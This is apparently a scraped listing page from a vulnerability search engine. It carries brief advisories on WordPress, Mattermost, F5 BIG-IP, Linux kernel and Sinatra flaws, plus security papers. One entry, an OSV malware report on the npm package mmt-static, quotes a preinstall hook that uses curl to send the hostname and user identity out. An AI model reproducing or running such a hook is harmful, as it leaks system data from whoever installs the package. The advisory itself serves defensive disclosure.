CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

CNNVD•added 2026/05/25 12:0 a.m.•6 views

WordPress plugin Export WP Page to Static HTML/CSS 跨站请求伪造漏洞

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform has the ability to set up a personal blog site on a PHP and MySQL based server.WordPress plugin is an application plugin. WordPress plugin...

6.5CVSS5.6AI score0.0014EPSS

OSV•added 2026/05/22 6:12 p.m.•7 views

MAL-2026-4612 Malicious code in mmt-static (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300 On npm install, the package's preinstall lifecycle hook executes node index.js && curl --data-urlencode "info=$hostname && whoami"...

Packet Storm News•added 2026/05/22 12:0 a.m.•8 views

Adversarial Vulnerability under Temporal Concept Drift: A Longitudinal Study of Android Malware Detection

We present a longitudinal, drift-aware evaluation of adversarial robustness across more than a decade of Android applications using static and dynamic feature representations extracted from emulator and real-device executions. The dataset is organized into yearly slices and evaluated under three...

Packet Storm News•added 2026/05/22 12:0 a.m.•6 views

Exploits0

angr 9.2.217

angr is an open-source binary analysis platform for Python. It combines both static and dynamic symbolic "concolic" analysis, providing tools to solve a variety of tasks...

Snyk•added 2026/05/21 11:46 a.m.•7 views

Exploits0

Directory Traversal

Overview github.com/mattermost/mattermost/server/channels/app is a private-cloud Slack alternative Affected versions of this package are vulnerable to Directory Traversal in the integration action URL process. An attacker can execute arbitrary API calls with system administrator privileges by...

9.9CVSS6.4AI score0.00249EPSS

Packet Storm News•added 2026/05/21 12:0 a.m.•16 views

Beyond Zero: Enterprise Security for the AI Era

The rise of autonomous AI agents and the accelerating velocity of corporate data access are stretching the application-centric model of zero trust security to its breaking point. This paper introduces Beyond Zero, a new security paradigm designed for the AI era. The Beyond Zero architecture...

Tenable Nessus•added 2026/05/21 12:0 a.m.•10 views

Exploits0

F5 Networks BIG-IP : BIG-IP BFD vulnerability (K000150508)

The version of F5 Networks BIG-IP installed on the remote host is prior to 17.1.3 / 17.5.1. It is, therefore, affected by a vulnerability as referenced in the K000150508 advisory. When Bidirectional Forwarding Detection BFD is configured in Static and Dynamic routing protocols, undisclosed traffi...

6.3CVSS5.8AI score0.00293EPSS

AstraLinux•added 2026/05/20 5:53 a.m.•5 views

Astra Linux - уязвимость в linux-5.10

In the Linux kernel, the following vulnerability has been resolved: Ring-buffer: Fixed the possibility of dereferencing an uninitialized pointer. There is a pointer called headpage in the function rbmetavalidateevents. This pointer is not initialized at the beginning of the function. This pointer...

5.5CVSS5.7AI score0.00115EPSS

AstraLinux•added 2026/05/20 5:53 a.m.•1 views

Astra Linux - уязвимость в linux-5.10, linux-6.1

In the Linux kernel, the following vulnerability has been resolved: ext4: xattr: fixed a null pointer dereference in ext4raw inode If ext4getinodeloc fails e.g., if it returns -EFSCORRUPTED, iloc.bh will remain set to NULL. Since ext4xattr inodedecrefall lacks error checking, this will lead to a...

5.8AI score0.00173EPSS

AstraLinux•added 2026/05/20 5:53 a.m.•2 views

Astra Linux - уязвимость в linux-5.10

In the Linux kernel, the following vulnerability has been resolved: Wifi: mac80211: Fixed an underflow in staticbranchdec for aqldisable. syzbot reported an underflow in aqlenablewrite. 0 The issue arises from the fact that aqlenablewrite does not serialize concurrent write calls to debugfs...

5.5CVSS5.4AI score0.00123EPSS

AstraLinux•added 2026/05/20 5:53 a.m.•5 views

Astra Linux - уязвимость в linux-5.10, linux-6.1

In the Linux kernel, the following vulnerabilities have been resolved: hwmon: w83791d Convert macros to functions to avoid Time-of-Check to Time-of-Use race conditions. The macro FANFROMREG evaluates its arguments multiple times. When used in lockless contexts involving shared driver data, this...

4.7CVSS6AI score0.00089EPSS

AstraLinux•added 2026/05/20 5:53 a.m.•7 views

Astra Linux - уязвимость в linux-5.10, linux-5.15, linux

In the Linux kernel, the following vulnerability has been resolved: gpio: Preventing potential speculation leaks in gpiodevicegetdesc The userspace may trigger a speculative read of an address outside the gpio descriptor array. Users can do this by calling gpioioctl with an offset that is out of...

5.5CVSS6AI score0.00248EPSS

7.8CVSS6AI score0.00295EPSS

Astra Linux - уязвимость в linux, linux-5.10

In the Linux kernel, the following vulnerability has been resolved: net/mlx4en: Fixed a use-after-free bug in mlx4entryallocresources In mlx4entryallocresources, mlx4encopypriv is called, and tmp-txcq will be freed during the error path of mlx4encopypriv. After that, mlx4enallocresources is calle...

5.5CVSS5.5AI score0.00272EPSS

Astra Linux - уязвимость в linux-5.10

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fixed NULL checks for adev-dm.dc in amdgpudmfini. Since adev-dm.dc in amdgpudmfini might turn out to be NULL before the call to dcenabledmubnotifications, checks were performed beforehand to ensure that there wil...

7.5CVSS6.7AI score0.0193EPSS

Astra Linux - уязвимость в ruby-sinatra

In versions of Sinatra before 2.2.0, it does not validate that the expanded path matches publicdir when serving static files...

7.8CVSS5.3AI score0.00129EPSS

Astra Linux - уязвимость в linux-5.10

In the Linux kernel, the following vulnerability has been resolved: misc: fastrpc: possible double-free of cctx-remoteheap The function fastrpcinitcreatestaticprocess may free the memory allocated to cctx-remoteheap during the errmap path, but does not clear the pointer pointing to that memory...